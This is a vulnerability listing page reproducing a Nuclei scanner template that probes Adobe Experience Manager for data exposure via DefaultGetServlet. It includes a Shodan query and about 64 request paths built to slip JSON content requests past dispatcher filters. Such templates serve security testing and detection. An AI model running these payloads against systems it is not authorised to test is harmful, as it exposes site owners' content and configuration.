aem-default-get-servlet: AEM DefaultGetServlet

日期: 2025-08-01 | 影响软件: aem-default-get-servlet | POC: 已公开

漏洞描述

Sensitive information might be exposed via AEM DefaultGetServlet.

PoC代码[已公开]

id: aem-default-get-servlet

info:
  name: AEM DefaultGetServlet
  author: DhiyaneshDk
  severity: low
  description: Sensitive information might be exposed via AEM DefaultGetServlet.
  reference:
    - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43
    - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/GetServletExposed.java
  classification:
    cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 64
    vendor: adobe
    product: experience_manager
    shodan-query: http.component:"Adobe Experience Manager"
  tags: aem,adobe,misconfig,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"

    payloads:
      paths:
        - "/etc"
        - "/var"
        - "/apps"
        - "/home"
        - "///etc"
        - "///var"
        - "///apps"
        - "///home"
        - "/.json"
        - "/.1.json"
        - "/....4.2.1....json"
        - "/.json?FNZ.css"
        - "/.json?FNZ.ico"
        - "/.json?FNZ.html"
        - "/.json/FNZ.css"
        - "/.json/FNZ.html"
        - "/.json/FNZ.png"
        - "/.json/FNZ.ico"
        - "/.children.1.json"
        - "/.children....4.2.1....json"
        - "/.children.json?FNZ.css"
        - "/.children.json?FNZ.ico"
        - "/.children.json?FNZ.html"
        - "/.children.json/FNZ.css"
        - "/.children.json/FNZ.html"
        - "/.children.json/FNZ.png"
        - "/.children.json/FNZ.ico"
        - "/etc.json"
        - "/etc.1.json"
        - "/etc....4.2.1....json"
        - "/etc.json?FNZ.css"
        - "/etc.json?FNZ.ico"
        - "/etc.json?FNZ.html"
        - "/etc.json/FNZ.css"
        - "/etc.json/FNZ.html"
        - "/etc.json/FNZ.ico"
        - "/etc.children.json"
        - "/etc.children.1.json"
        - "/etc.children....4.2.1....json"
        - "/etc.children.json?FNZ.css"
        - "/etc.children.json?FNZ.ico"
        - "/etc.children.json?FNZ.html"
        - "/etc.children.json/FNZ.css"
        - "/etc.children.json/FNZ.html"
        - "/etc.children.json/FNZ.png"
        - "/etc.children.json/FNZ.ico"
        - "///etc.json"
        - "///etc.1.json"
        - "///etc....4.2.1....json"
        - "///etc.json?FNZ.css"
        - "///etc.json?FNZ.ico"
        - "///etc.json/FNZ.html"
        - "///etc.json/FNZ.png"
        - "///etc.json/FNZ.ico"
        - "///etc.children.json"
        - "///etc.children.1.json"
        - "///etc.children....4.2.1....json"
        - "///etc.children.json?FNZ.css"
        - "///etc.children.json?FNZ.ico"
        - "///etc.children.json?FNZ.html"
        - "///etc.children.json/FNZ.css"
        - "///etc.children.json/FNZ.html"
        - "///etc.children.json/FNZ.png"
        - "///etc.children.json/FNZ.ico"
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - 'jcr:createdBy'
        condition: and
# digest: 4a0a00473045022100e5273e0c26aea46b61c2c741da70ae92bd5929568ba31d12eb9719325f91bf6202203f00a53dd09bee8eb3403cf692f7a88c22abd94113a4dda6e65a4d9ebdd21969:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/misconfiguration/aem/aem-default-get-servlet.yaml